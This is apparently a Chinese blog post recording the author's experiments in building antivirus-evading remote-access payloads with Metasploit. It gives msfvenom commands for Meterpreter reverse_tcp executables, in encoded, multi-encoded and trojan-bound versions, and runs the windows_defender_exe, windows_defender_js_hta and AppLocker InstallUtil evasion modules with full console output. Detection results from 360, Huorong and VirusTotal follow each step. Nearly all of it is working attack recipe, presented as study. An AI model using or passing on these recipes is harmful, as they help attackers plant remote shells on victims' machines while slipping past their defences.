远控免杀的学习(一)

目录0x00 前言 0x01 msf自带的免杀 1.未处理的payload：2.msf自编码处理的payload：3.msf自捆绑的payload：4.msf自捆绑+编码的payload：5.msf多重编码的payload：msf下的evasion模块免杀 1.windows/windows_defender_exe模块 2.windows/windows_defender_js_hta模块 3.windows/applocker_evasion_install_util模块

0x00 前言

最近这几天不知道为什么被远控免杀给迷住了，原因都是因为这个https://github.com/TideSec/BypassAntiVirus
虽然上面记录的，在现在很多都不怎么免杀了，自己还是决定学习其中的一些方法。前面的一些免杀工具只是部分使用，感觉大部分工具都是跟msfvenom扯不开关系的，而使用的工具中觉得免杀不行的，也不想记录。主要是360全家桶和火绒作主要查杀工具，VT作为参考。

0x01 msf自带的免杀

(msfvenom的参数就不说了)

1.未处理的payload：

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.111.128 LPORT=4444 -f exe -o ./payload1.exe
VT：58/72；火绒和360秒杀。

2.msf自编码处理的payload：

编码器为x86/shikata_ga_nai：msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.111.128 LPORT=4444 -e x86/shikata_ga_nai -b "x00" -i 15 -f exe -o ./payload2.exe
VT:57/72；火绒和360秒杀

3.msf自捆绑的payload：

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.111.128 LPORT=4444 -x 11.exe -f exe -o ./payload3.exe(其中的11.exe是一个正常的、无后门的exe文件，我自己用python写的小工具.exe文件)
VT:11/72
火绒和360秒杀

4.msf自捆绑+编码的payload：

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.111.128 LPORT=4444 -e x86/shikata_ga_nai -x 11.exe -i 5 f exe -o ./payload4.exe(这种方式有问题，生成的payload很容易无法运行)

5.msf多重编码的payload：

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 20 LHOST=192.168.111.128 LPORT=4444 -f raw | msfvenom -e x86/alpha_upper -i 10 -f raw | msfvenom -e x86/countdown -i 10 -x 360sd.exe -f exe -o payload5.exe
(仅作参考，msfvenom生成失败，就没管了)

msf下的evasion模块免杀

show evasion可查看其下的模块。

1.windows/windows_defender_exe模块

msf5 > use windows/windows_defender_exe
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf5 evasion(windows/windows_defender_exe) > show options 
Module options (evasion/windows/windows_defender_exe):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   FILENAME  ukup.exe         yes       Filename for the evasive file (default: random)
Payload options (windows/meterpreter/reverse_tcp):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.111.128  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port
Evasion target:
   Id  Name
   --  ----
   0   Microsoft Windows
msf5 evasion(windows/windows_defender_exe) > set filename payload.exe
filename => payload.exe
msf5 evasion(windows/windows_defender_exe) > set payload windows/meterpreter/reverse_tcp 
payload => windows/meterpreter/reverse_tcp
msf5 evasion(windows/windows_defender_exe) > run
[*] Compiled executable size: 4096
[+] payload.exe stored at /root/.msf4/local/payload.exe

静态360直接给秒杀了，火绒就不用试了。（火绒np）

2.windows/windows_defender_js_hta模块

msf5 evasion(windows/windows_defender_exe) > use windows/windows_defender_js_hta
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf5 evasion(windows/windows_defender_js_hta) > show options 
Module options (evasion/windows/windows_defender_js_hta):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   FILENAME  WfvPutTKt.hta    yes       Filename for the evasive file (default: random)
Payload options (windows/x64/meterpreter/reverse_tcp):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.111.128  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port
Evasion target:
   Id  Name
   --  ----
   0   Microsoft Windows
msf5 evasion(windows/windows_defender_js_hta) > set filename payload.hta
filename => payload.hta
msf5 evasion(windows/windows_defender_js_hta) > run
[+] payload.hta stored at /root/.msf4/local/payload.hta
msf5 evasion(windows/windows_defender_js_hta) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 evasion(windows/windows_defender_js_hta) > set filename payload1.hta
filename => payload1.hta
msf5 evasion(windows/windows_defender_js_hta) > run
[+] payload1.hta stored at /root/.msf4/local/payload1.hta

360全家桶和火绒都没报毒。(虽然没报毒，但是在运行的时候会生成一个新的程序来返回shell，但新程序过不了火绒和360，也就是过不了行为检测)
payload的VT：23/59；payload1的VT：23/58

3.windows/applocker_evasion_install_util模块

msf5 evasion(windows/windows_defender_js_hta) > use windows/applocker_evasion_install_util
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf5 evasion(windows/applocker_evasion_install_util) > 
msf5 evasion(windows/applocker_evasion_install_util) > show options 
Module options (evasion/windows/applocker_evasion_install_util):
   Name      Current Setting   Required  Description
   ----      ---------------   --------  -----------
   FILENAME  install_util.txt  yes       Filename for the evasive file (default: install_util.txt)
Payload options (windows/meterpreter/reverse_tcp):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.111.128  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port
Evasion target:
   Id  Name
   --  ----
   0   Microsoft Windows
msf5 evasion(windows/applocker_evasion_install_util) > set filename payload.txt
filename => payload.txt
msf5 evasion(windows/applocker_evasion_install_util) > show options 
Module options (evasion/windows/applocker_evasion_install_util):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   FILENAME  payload.txt      yes       Filename for the evasive file (default: install_util.txt)
Payload options (windows/meterpreter/reverse_tcp):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.111.128  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port
Evasion target:
   Id  Name
   --  ----
   0   Microsoft Windows
msf5 evasion(windows/applocker_evasion_install_util) > run
[+] payload.txt stored at /root/.msf4/local/payload.txt
[*] Copy payload.txt to the target
[*] Compile using: C:WindowsMicrosoft.NetFramework[.NET Version]csc.exe /out:payload.exe payload.txt
[*] Execute using: C:WindowsMicrosoft.NetFramework[.NET Version]InstallUtil.exe /logfile= /LogToConsole=false /U payload.exe

360和火绒静态都过，但是行为查杀熄火。

远控免杀的学习(一)

0x00 前言

0x01 msf自带的免杀

1.未处理的payload：

2.msf自编码处理的payload：

3.msf自捆绑的payload：

4.msf自捆绑+编码的payload：

5.msf多重编码的payload：

msf下的evasion模块免杀

1.windows/windows_defender_exe模块

2.windows/windows_defender_js_hta模块

3.windows/applocker_evasion_install_util模块

如何利用word制作论文的封面

802.11无线网络权威指南

最新文章

realme 市场沟通总监：真我 GT7 Pro 核心部件全部来自国际顶尖供应链合作

ctf加载程序需要自启动吗(ctf加载程序开机启动能禁用吗)

c语言转义字符占几个字节(c语言转义字符的使用输出字符串)

有线中继插wan口还是lan口(有线桥接时接wan口还是lan口)

shell循环分为几种(shell的循环控制结构)

mt6771v处理器相当于骁龙多少(联发科mt6771v处理器怎么样)

删除数据库表的命令(删除表的内容sql命令是什么)

怎么练口才(怎么训练自己的说话能力)

俄罗斯人口是多少(2021年中国人口是多少)

火葬场特点介绍火葬场技术设备介绍

最新评论

标签

关注我们么么哒！

远控免杀的学习(一)

0x00 前言

0x01 msf自带的免杀

1.未处理的payload：

2.msf自编码处理的payload：

3.msf自捆绑的payload：

4.msf自捆绑+编码的payload：

5.msf多重编码的payload：

msf下的evasion模块免杀

1.windows/windows_defender_exe模块

2.windows/windows_defender_js_hta模块

3.windows/applocker_evasion_install_util模块

如何利用word制作论文的封面

802.11无线网络权威指南

最新文章

realme 市场沟通总监：真我 GT7 Pro 核心部件全部来自国际顶尖供应链合作

最新评论

标签

关注我们 么么哒！

关注我们的公众号

关注我们么么哒！